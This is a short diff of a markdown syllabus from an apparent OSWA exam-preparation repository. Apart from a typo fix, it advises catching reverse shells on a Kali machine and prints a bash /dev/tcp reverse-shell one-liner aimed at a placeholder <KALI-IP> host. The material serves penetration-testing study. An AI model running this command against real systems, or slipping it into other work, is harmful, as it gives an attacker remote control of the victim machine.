rndinfosecguy/OSWA-Experience-And-Exam-Preparation/syllabus.md

 ```

 ### Shells
 During the course and the exam you will have to identify/exploit different kind of vulnerabilities which might lead to some kind of remote code execution.
-Therefore it is always useful to get reverse shell connecting to your kali machine instead of exploiting the
+Therefore it is always useful to get a reverse shell connecting to your kali machine instead of exploiting the
 vulnerability again and agin.
 For me in most cases the standard `bash` back connect shell worked great (under linux of course)
 ```bash
 bash -c 'bash -i >& /dev/tcp/<KALI-IP>/9090 0>&1'